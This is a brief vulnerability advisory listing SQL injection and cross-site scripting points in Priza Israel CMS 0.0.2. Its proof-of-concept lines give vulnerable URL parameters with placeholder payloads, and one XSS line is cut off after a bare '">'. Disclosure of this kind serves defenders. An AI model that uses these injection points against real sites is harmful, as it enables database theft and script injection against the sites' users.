Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
Author: BHG Security Center
Software link: http://www.priza.co.il/
Affected version: [0.0.2]
Tested on: ubuntu 11.04
Discovered by:
- Net.Edit0r (Net.edit0r [at] att [dot] net)
- G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
-----------------------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
~ [PoC] ~: /website_path/index.asp?p_id=201&id=[SQLi]
~ [PoC] ~: /website_path/index.asp?page_id=[SQLi]
~ [PoC] ~: /website_path/volumes.asp?id=18
~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss]
~~~~~~~~ Test
~ [PoC] ~: Http:// /path/index.asp?p_id=201&id=[SQLi]
~ [PoC] ~: Http:// /path/index.asp?action=find&page_id=28&string=">
-------------------------------- [ EOF ] ----------------------------------